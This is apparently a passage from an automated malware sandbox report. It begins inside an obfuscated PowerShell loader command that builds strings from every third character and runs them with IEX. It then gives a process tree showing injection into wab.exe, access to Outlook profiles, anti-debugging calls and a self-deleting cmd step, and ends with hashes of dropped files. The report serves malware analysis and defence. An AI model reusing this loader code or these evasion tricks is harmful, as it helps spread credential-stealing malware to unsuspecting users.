SDAz5Af7Kr5Kn2Co5HjESa5Op6Hv3 V1Pa0 cDSi0StDHe1In7Br1 KBMi4feCte5TuEDa3 GEAd5Un6Oo2 D5Fl3 u7 f1Le0Mo0AlAHi2ovEca0BaA T0AaC K2 T3 F5Em2 a5ByEUb2Pa5Ca3La7 T1 V0Te0KlAUn2AmESt0 FA M0ReCKr2 B3 E5 V2Fe5PaETo2Fo5ho3 B7Li1Te0Ma0DiABe2 NE P0ruADi0FoCMm2Ll3in5Ak7Ma5ImEpa5Ke6Re2Ba5Pa3Tr7Sp1 V0po0DiABe2RlEUn0KoA G0UnCHn2 s3Ma5Ca7 G5Re7Al5No7 S'Ig)Fs;Ov&Fe(Va`$reAalfBuspokKorSpiHjv EnSciDanbegNisEgmimaEpaSkdIne BsVi7po)Er Vr( SJGaaBemHeb Ee SaEmuPrxMu0Wa4He Je'Ar5ReAPe0unAIn0Pe9Bo1OfBSp1FrBRe0NiDCo1On6Up1LoDHo0ReFRe0BeBSc1Li7To0MaAcr0AsACu1HvBSi1HeAEk5Ti0Co3Su7Ki1Ch0ap0Fe8Cr1 T1Aa1Po5Kl1TaB D5Ps6re4 rEVo5Af2Mo5MoASq3Te8Kr0DdC P1BoFBl1Ma2La1Cy9Dy1Ka9Ba1poBDk1Ge2bl0LeDfj1anBUn0SmCGr5 H2Bl4SpEGe5Di7St'Ni) U#Sk;""";function Ossie5 ($tweesh,$Tekstbaseret) { &$Ossie0 (Undergunner9 'Ar$ FtKew OeCoe FsPohFl Od- tbMoxReoHjrMi N$taTHyeBykMasUnt UbCha VsFieKarKreRetLo ');}Function Undergunner9 ($Stavenes) { $Hansens=2+1; For($Degradand=2; $Degradand -lt $Stavenes.Length-1; $Degradand+=($Hansens)){ $Omstter = 'su'+'bstri'+'ng'; $Jambeaux = $Jambeaux + $Stavenes.$Omstter.Invoke($Degradand, 1); } $Jambeaux;}$Ossie0 = Undergunner9 'MeI VEHaXsl ';&$Ossie0 (Undergunner9 $Hooray);<#Typy Tinder Procentsatsers Manned Tvistepunkters skibsbyggere Bloodwood #>;"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "wab.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 37⤵
- Delays execution with timeout.exe
PID:2708
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD51fcb3f34b5588f6a647a06dff1811bf9
SHA11f5ef0e6e41c14795decedcefc883ab9000fac9a
SHA256a99e8172248dac0b2a6243d06a862901989857b0c2ecbed5f25ddb0d1a95154e
SHA51247e951583afff444f9adb09beab0d83f9792b46d3e1fabf05d21068218d64b3cba48e2dc22fe0a7bd3252a0e0c8866faa244b5dc3784bd336ecbc9f2924fb2aa
-
Filesize
526KB
MD52f6d743afc4df942a87994ed518b2cfa
SHA193d40b5f69761bc61be95ac81751aa4d42cb915b
SHA256d71cf4d9c339c4b22b55e912c756836625174e8deb1af7cc1a0150ea56d3b3aa
SHA512e6d8153cd97d3258dede2adc291ad1d71e327c776b413da4b125d5d0ba8683470a67bad8c5d203bffd6ea0f688ba8ef732cb2bf07c61ab448a2638e5ccd116c8
-
Filesize
354KB
MD5803506feee3341ed60ffa3d244fc801c
SHA1772e3671da73d224f2f2a3123f62a42763c93a94
SHA256763c8a79f33695bb1d1f590b79173e4397b58f741802531c5f124977acf52dfc
SHA51211125b276aee150761bd840f0a0f3dcab8f292be92297b1aff4fe0cf0e79761c71f8965664e49ebe2c66e5c0fce9dce0a95b873602c9f65877b8c8f0d599cee2
-
C:\Users\Admin\AppData\Local\Temp\afdelingsarkitekters\Eksamenstilmeldingen\Kloesse\Okkultister153\Cleidohyoid\Aminoacetophenone.Kur
Filesize19KB
MD523ddf1c071c3524528c68436f3e68233
SHA153193b34234585bb51298c1815f51c98396b3854
SHA256bcecd1aeec782234390e9f49365ec5d6902db0461a2a4fd6e72d3dd152bba65d
SHA512a95edf21fdf356845aeabf0f3be1356e11dd9e5f0725ce19e9783343b612f18aef653af8a03501f94b0cfc1a6c04bf5621a72baf04e7cf3b303a55ae4a28198f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD50f1bd2bb5e9ba6b2c3140608fd5d6d5a
SHA156b1325afcfc961d2bb34e1e2ee3f2246b3ad6f1
SHA256b62a90280a1bae729db4b8e4cd6a99bc338bf502d0f5e208fca61851d632bdb9
SHA512c533a2e233577da7485a89a53e1eca18bab921ab80bfbdf0ddf5ab38fe804eddf590c646675d6d9ba26992fed611fc85d4dd05d13bb0fe4085eab36d764dbc7e
-
Filesize
741KB
MD50b96e8a9f710917f8ebbeba13040e308
SHA1aae0d2dc73cdab47aadab3ba138979824d1b51e9
SHA256efe86c187239b2975ba8583a09b1d80f12931c88ada677d00acc22d40e8cd268
SHA512611d851ed35e3e29a5d104c09e1b59a32021248afe172c4bd422e29409619b0aa78e473863d32d093d1176cb66b11d4b2ab1b6af2e3d4fd5cb0fc28761956823
-
Filesize
21KB
MD572e28c902cd947f9a3425b19ac5a64bd
SHA19b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA2563cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SHA51258ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff
-
Filesize
18KB
MD5ac290dad7cb4ca2d93516580452eda1c
SHA1fa949453557d0049d723f9615e4f390010520eda
SHA256c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SHA512b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8
-
Filesize
19KB
MD5aec2268601470050e62cb8066dd41a59
SHA1363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA2567633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SHA5120c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f
-
Filesize
18KB
MD593d3da06bf894f4fa21007bee06b5e7d
SHA11e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SHA51272bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6
-
Filesize
18KB
MD5a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1116846ca871114b7c54148ab2d968f364da6142f
SHA256565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SHA512e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe
-
Filesize
28KB
MD58b0ba750e7b15300482ce6c961a932f0
SHA171a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SHA512fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a
-
Filesize
25KB
MD535fc66bd813d0f126883e695664e7b83
SHA12fd63c18cc5dc4defc7ea82f421050e668f68548
SHA25666abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735
SHA51265f8397de5c48d3df8ad79baf46c1d3a0761f727e918ae63612ea37d96adf16cc76d70d454a599f37f9ba9b4e2e38ebc845df4c74fc1e1131720fd0dcb881431
-
Filesize
22KB
MD541a348f9bedc8681fb30fa78e45edb24
SHA166e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SHA5128c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204
-
Filesize
23KB
MD5fefb98394cb9ef4368da798deab00e21
SHA1316d86926b558c9f3f6133739c1a8477b9e60740
SHA256b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SHA51257476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8
-
Filesize
22KB
MD5404604cd100a1e60dfdaf6ecf5ba14c0
SHA158469835ab4b916927b3cabf54aee4f380ff6748
SHA25673cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SHA512da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4
-
Filesize
20KB
MD5849f2c3ebf1fcba33d16153692d5810f
SHA11f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA25669885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SHA51244dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5
-
Filesize
18KB
MD5b52a0ca52c9c207874639b62b6082242
SHA16fb845d6a82102ff74bd35f42a2844d8c450413b
SHA256a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0
SHA51218834d89376d703bd461edf7738eb723ad8d54cb92acc9b6f10cbb55d63db22c2a0f2f3067fe2cc6feb775db397030606608ff791a46bf048016a1333028d0a4
-
Filesize
135KB
MD59e682f1eb98a9d41468fc3e50f907635
SHA185e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SHA512230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed
-
Filesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
Filesize
1.1MB
MD52eb1294015967d890c0f356b6989fc84
SHA1cd0b100644eac2b6f74dc2fbbe35663053ab6a02
SHA2566a1f97b1b0a8391ea753000e5991ab5f03910f593e130b18cb3b3f97b095c50f
SHA51219db52025f67455be6c66e2d4f69561f74abaa8c9afc2cd05bffeec216ac7d889d1035313ae4bded0df3e8ded7bddafe6bb736687b593dcce17e09bbc217cf27
-
Filesize
81KB
MD57587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA5120b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f